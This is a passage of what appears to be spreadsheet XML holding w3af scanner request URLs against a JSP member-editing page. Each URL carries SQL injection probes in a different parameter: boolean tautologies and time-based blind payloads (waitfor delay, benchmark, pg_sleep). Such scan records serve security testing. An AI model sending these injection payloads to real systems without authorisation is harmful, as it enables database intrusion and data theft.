    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=46+or+46=46+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=46+and+46=47+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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1"+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1"+and+"1"="2&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+and+'1'='2&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+or+1=1+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+and+1=2+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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70"+or+"70"="70&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=70"+and+"70"="71&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=70'+or+'70'='70&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=70'+and+'70'='71&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=70+or+70=70+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=70+and+70=71+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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75"+or+"75"="75&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=75"+and+"75"="76&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=75'+or+'75'='75&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=75'+and+'75'='76&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=75+or+75=75+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=75+and+75=76+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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w3af@email.com&amp;modo=insertar"+or+"15"="15</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar"+and+"15"="16</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar'+or+'15'='15</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar'+and+'15'='16</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51"+or+"51"="51&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51"+and+"51"="52&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51'+or+'51'='51&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51'+and+'51'='52&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51+or+51=51+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=51+and+51=52+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
